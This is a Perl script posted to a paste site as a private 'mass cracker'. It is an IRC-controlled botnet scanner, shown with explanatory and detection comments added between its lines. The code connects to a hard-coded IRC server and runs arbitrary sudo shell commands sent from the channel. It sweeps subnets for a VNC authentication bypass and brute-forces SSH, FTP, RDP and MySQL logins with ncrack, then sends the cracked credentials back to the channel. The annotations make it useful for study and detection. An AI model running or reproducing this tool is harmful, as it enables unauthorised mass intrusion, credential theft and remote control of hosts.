independentt

NCrack mass cracker (private)

Apr 23rd, 2016
  1. #!/usr/bin/perl
  2. # Use at your own risk!
  3. #For it to crack you need to install ncrack or be using a l337 OS like KaliLinux v2
  4. #Also you will need to create /user and /pass file (the tested credentials on target)
  5. #The code is still buggy. Sorry but I'm still noob at perl >_>
  6. #invoke the script like this: sudo perl scan.pl (or as root) perl scan.pl  
  7. #This script was made for educational purposes only, please don't attack military nor government.
  8. #when you think you got passwords in your list type to the bot or channel !list will say it found credentials
  9.  
  10. use IO::Socket;
  11. use IO::Socket::INET;
  12. use threads;
  13. use threads::shared;
  14. use Errno qw(EAGAIN);
  15. use strict;
  16. use warnings;
  # Global state and command-channel setup. Everything after this run is
  # driven by text read from the socket opened at the end of it.
  17. my $line;
  18. our @results : shared;
  19. our $todo = 0;
  # NOTE(review): $contatore and $out_file are never read in the visible
  # listing; $orig_thread is only written (in DivideWork), never tested.
  20. our $contatore = 0;
  21. my $orig_thread = "yes";
  22. my $start;
  23. my $end;
  24. my $out_file;
  # Random suffix for the IRC nick: an integer from 0 to 99998.
  25. my $range = 99999;
  26. my $random_number = int(rand($range));
  # Ports given the RFB (VNC) handshake in Scan_ALL.
  27. my @VNC_PORTS = qw/5900 5901/;
  # [port, label] pairs; Scan_ALL lowercases the label to form the ncrack
  # service URL (mysql://, ssh://, ftp://, rdp://).
  28. my @ncrack_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
  29. my $splits = 8; # Creates 2^N processes.
  30. our $subnet;
  # Detection: server, port and channel are hard-coded, so outbound TCP to
  # this host on 6667 and the literal registration strings sent below
  # (nick "Guest<digits>", realname "Perl bot by independent") are usable
  # network indicators for this sample.
  31. my $server="irc.crimeircd.net"; # irc server
  32. my $porta="6667"; # port
  33. my $nick="Guest$random_number";# nick
  34. my $canale="#RDP"; # channel
  # Plain TCP with no TLS; the script dies if the connection cannot be made.
  35. my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
  36. $sk->autoflush(1);
  # IRC registration (NICK then USER) is sent immediately after connecting.
  37. print $sk "NICK $nick\r\n";
  38. print $sk "USER Guest$random_number 8 * :Perl bot by independent\r\n";
  39.  
  40.  
  # Main command loop: blocks on the IRC socket and tests every received line
  # against each handler below. The patterns are unanchored substring matches
  # on the raw protocol line and no sender check is visible, so any line that
  # contains a trigger word -- from any user or from the server -- fires the
  # handler.
  41. while ($line = <$sk>) {
  42.   $line =~ s/\r\n$//;
  # Every received line is echoed to STDERR.
  43.    warn "$line";
  # Keep-alive: answers with the configured server name (not the token from the
  # PING line), then (re)joins the channel and announces itself on every PING.
  44.    if ($line=~ /PING/) {
  45.    print $sk "PONG :$server\r\n";
  46.    print $sk "JOIN $canale \r\n";
  47.    printa("?Ping Pong!, pastebin.com/raw/cp5BZnv4");
  48.  
  49.   }
  # Reply to a server line containing "nospoof": the bot presents itself as the
  # mIRC v7.45 client and sends CAP LS / CAP END.
  50.   if ($line=~ /nospoof/) {
  51.    print $sk "NOTICE IRC :mIRC v7.45\r\n";
  52.     print $sk "CAP LS\r\n";
  53.    print $sk "CAP END\r\n";
  54.   }
  # !help: prints the command list to the channel.
  55.     if ($line=~ /!help/) {
  56. printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  57.   }
  # !list: relays every line of xploits.log that contains a single quote to the
  # channel. Scan_ALL appends ncrack output to that file, so this is the point
  # where harvested results leave the host, in clear text over IRC.
  # NOTE(review): presumably the quote test selects ncrack's credential lines --
  # confirm against real ncrack output.
  58.   if ($line=~ /!list/)
  59.   {
  60.  
  61.     my $file = 'xploits.log';
  # A failed open only warns; the read loop below still runs on $fh.
  62.     open my $fh, '<', $file or warn "Could not open '$file' $!\n";
  63.  
  64.     while (my $lines = <$fh>) {
  65.       chomp $lines;
  66.       if ($lines=~ /'/) {
  67.         printa("$lines");
  68.       }
  69.     }
  70.   }
  # !reload: system() is given a one-element list whose string contains shell
  # operators, so it is run through the shell. "pkill perl" matches by process
  # name and is not limited to this script.
  71.   if ($line=~ /!reload/)
  72.   {
  73.     printa("Reloading...");
  74.     my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill ncrack");
  75.     system(@cmd);
  76.   }
  # !die: same mechanism as !reload, without the restart.
  77.   if ($line=~ /!die/)
  78.   {
  79.     printa("Dying...");
  80.     my @cmd = ("sudo pkill perl && sudo pkill ncrack");
  81.     system(@cmd);
  82.   }
  # !sudo: everything after "!sudo " on the raw line is interpolated into a
  # shell command, run through backticks under sudo, and its output is sent
  # back to the channel line by line. With no sender check, any text carrying
  # the trigger that reaches this socket runs with whatever rights sudo grants.
  # Host-side detection: a perl process spawning sh/sudo, and sudo log entries
  # whose parent is this script.
  83.   if ($line=~ /!sudo\s+(.*)/)
  84.   {
  85.         my $command = $1;
  86.         printa("Done: $command ");
  87.     my $cmd = "sudo $command";
  88.     my @output = `$cmd 2>&1 3>&1`;
  89.     foreach(@output) {
  90.       printa("$_\r\n");
  91.     }
  92.   }
  93.  
  94.  
  # !scan: takes the text after "!scan " as a target and sweeps the containing
  # /24. The argument is reduced to its first three dotted groups below, so the
  # fourth octet and anything after it are discarded.
  95.   if ($line=~ /!scan (.+)/)
  96.   {
  97.  
  98.  
  99.     $todo = 0;
  100.     $subnet = $1;
  101.     if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
  102.  
  103.       # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
  104.       $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
  105.       $subnet .= ".";
  106.       printa("Scanning subnet ${subnet}x\n");
  107.  
  108.       CHECK: {
  109.         unless ($splits >= 0 && $splits <= 8) {
  110.           die "ERROR: Do not split $splits times--that makes no sense.\n";
  111.         }
  112.       }
  113.  
  # Each DivideWork() call forks once in every process that reaches it, so
  # with $splits = 8 a single !scan produces up to 2^8 = 256 processes.
  114.       # Ugly, but this works.
  115.       DivideWork() if $splits >= 1;
  116.       DivideWork() if $splits >= 2;
  117.       DivideWork() if $splits >= 3;
  118.       DivideWork() if $splits >= 4;
  119.       DivideWork() if $splits >= 5;
  120.       DivideWork() if $splits >= 6;
  121.       DivideWork() if $splits >= 7;
  122.       DivideWork() if $splits >= 8;
  123.  
  # $todo is this process's index; it selects a slice of 256 / 2^$splits host
  # numbers. With $splits = 8, $start == $end == $todo: one host per process.
  124.       $start = $todo << (8 - $splits);
  125.       $end = $start + (256 / (2**$splits)) - 1;
  126.  
  127.       foreach ($start .. $end) {
  128.  
  129.         Scan_ALL($_);
  130.  
  131.       }
  # No exit follows the scan, so every forked process falls back into the read
  # loop above on the same inherited socket.
  132.      }
  133.    
  134.    else {
  135.       printa("Are you brain-dead? Use a correct IP format. ");
  136.     }
  137.  
  138.   }
  139. }
  140.  
  141.  
  142.   ####################################
  143.  
  # DivideWork: forks once and gives parent and child different work indices.
  # $todo is doubled first; the parent then adds 1 (odd index) and the child
  # keeps the even one. After k successful calls in every process the indices
  # are distinct values in 0 .. 2^k - 1. Takes no arguments and returns
  # nothing useful; it works through the globals $todo and $orig_thread.
  144.   sub DivideWork {
  145.     my $pid;
  146.  
  147.     FORK: {
  148.       $todo *= 2;
  149.       if ($pid = fork) {
  150.         # Parent
  151.         ++$todo;
  152.  
  153.         } elsif (defined $pid) {
  154.         # Child
  # $orig_thread is set here but never read in the visible listing.
  155.         $orig_thread = "no";
  156.  
  157.         } elsif ($! == EAGAIN) {
  158.         # Recoverable forking error.
  # redo re-enters the block, so $todo is doubled again on each retry.
  159.         sleep 7;
  160.         redo FORK;
  161.  
  162.         } else {
  163.         # Unable to fork.
  # The failure is reported to the IRC channel; execution continues.
  164.         printa("Unable to fork: $!\n");
  165.  
  166.       }
  167.     }
  168.   }
  169.  
  170.  
  171.  
  # Scan_ALL($hostnum): probes one address, $subnet . $hostnum, in two stages.
  #   1. On each port in @VNC_PORTS, runs the RFB handshake below and reports
  #      the host to the channel if the server proceeds without authentication.
  #   2. For the first port in @ncrack_PORTS that accepts a TCP connection,
  #      launches ncrack against that service and returns.
  # Host numbers <= 0 and >= 255 are skipped. Returns nothing.
  172.   sub Scan_ALL {
  173.     # Scan for OpenVNC 4.11 authentication bypass.
  174.  
  175.     my $hostnum = shift;
  176.     my $host = $subnet . $hostnum;
  # This outer $sock is never assigned; both loops declare their own.
  177.     my $sock;
  178.     my $proto_ver;
  179.     my $ignored;
  180.     my $auth_type;
  181.     my $sec_types;
  182.     my $vnc_data;
  183.  
  184.  
  185.     $host or printa("ERROR: missing Host IP address Scan_ALL.");
  186.  
  187.     # The host numbers .0 and .255 are reserved; ignore them.
  188.     if ($hostnum <= 0 or $hostnum >= 255) { return; }
  189.  
  190.     # Format things nicely--that crazy formula just adds spaces.
  191.     $results[$hostnum] = "$host";
  192.     $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
  # Stage 1. The check is whether the server accepts security type 1 ("no
  # authentication") when the client claims it, regardless of the types the
  # server offered. Defensive reading: a VNC service reachable on 5900/5901
  # that honours a type it did not offer is what gets reported; patched
  # servers and services not exposed to untrusted networks are not affected.
  193.     foreach my $port (@VNC_PORTS)
  194.     {
  195.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')) {
  196.  
  # Read the server's 12-byte protocol banner and echo it back unchanged.
  197.         $sock->read($proto_ver, 12);
  198.         print $sock $proto_ver;
  199.  
  200.         # Get supported security types and ignore them.
  201.         $sock->read($sec_types, 1);
  202.  
  203.         $sock->read($ignored, unpack('C', $sec_types));
  204.         # Claim that we only support no authentication.
  205.         print $sock "\x01";
  206.  
  207.  
  208.         # We should get "0000" back, indicating that they won't fall back to no authentication.
  # A non-zero result returns from the whole sub, so the remaining VNC port
  # and the ncrack stage are skipped for this host.
  209.         $sock->read($auth_type, 4);
  210.         if (unpack('I', $auth_type)) {
  211.           close($sock);
  212.           return;
  213.         }
  214.  
  215.         # Client initialize.
  216.         print $sock "\x01";
  217.  
  218.         # If the server starts sending data, we're in.
  219.         $sock->read($vnc_data, 4);
  # This message is sent for every host that got this far, before the result
  # is known; only the branch below marks the host as vulnerable.
  220.         printa("[Xploiting VNC] $host");
  221.         if (unpack('I', $vnc_data)) {
  222.           $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
  223.           printa("9,3 [ $port ] $results[$hostnum] $port ");
  224.         }
  225.       }
  226.     }
  # Stage 2. A bare TCP connect is used as the liveness test; the first port
  # that answers is handed to ncrack and the sub returns, so at most one
  # service per host is attempted. The command is a single string, so it goes
  # through the shell; results are appended to xploits.log in the working
  # directory, with /user and /pass as the username and password lists.
  # Detection: a process command line beginning "ncrack -U /user -P /pass",
  # the files /user, /pass and xploits.log on the scanning host, and on the
  # target a burst of failed logins against one of these four services.
  227.     foreach my $port (@ncrack_PORTS)
  228.     {
  229.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port->[0], Proto => 'tcp')) {
  230.         close($sock);
  231.         printa("[Cracking " . $port->[1] . "] $host");
  232.         my @cmdncrack = ("ncrack -U /user -P /pass " . lc($port->[1]) . "://" . $host . ",at=5,cl=1,CL=3,cd=5s,cr=0,to=2h --connection-limit 64 -v -f >>xploits.log");
  233.         system(@cmdncrack);
  234.         return;
  235.       }
  236.     }
  237.  
  # Refers to the outer, never-assigned $sock declared at the top of the sub.
  238.     close($sock);
  239.     return;
  240.   }
  241.  
  # printa($text): sends $text to the configured channel as one PRIVMSG on the
  # global IRC socket $sk. Only the first argument is used.
  # NOTE(review): the "4,5" prefix is presumably an mIRC colour code whose
  # control character was lost in the paste -- confirm against a raw copy.
  242.   sub printa {
  243.     print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
  244.   }